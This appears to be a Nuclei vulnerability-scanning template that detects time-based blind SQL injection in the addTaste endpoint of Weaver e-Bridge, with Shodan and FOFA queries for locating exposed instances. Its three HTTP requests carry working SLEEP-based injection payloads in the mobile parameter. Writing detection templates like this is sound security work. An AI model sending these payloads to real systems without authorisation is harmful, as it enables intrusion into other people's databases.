id: weaver-ebridge-addtaste-sqli

info:
  name: Weaver E-Bidge addTaste - SQLi
  author: H0nayuzu
  severity: high
  metadata:
    verified: true
    max-request: 4
    shodan-query: eBridge_JSessionid
    fofa-query: app="泛微云桥e-Bridge"
  tags: eBridge,weaver,oa,sqli

http:
  - raw:
      - |
        GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(3-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache

      - |
        GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(6-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache

      - |
        GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache

    matchers:
      - type: dsl
        condition: and
        dsl:
          - "duration_1>=3  && duration_1<=6"
          - "duration_2>=6  && duration_2<=9"
          - "duration_3>=9  && duration_3<=12"
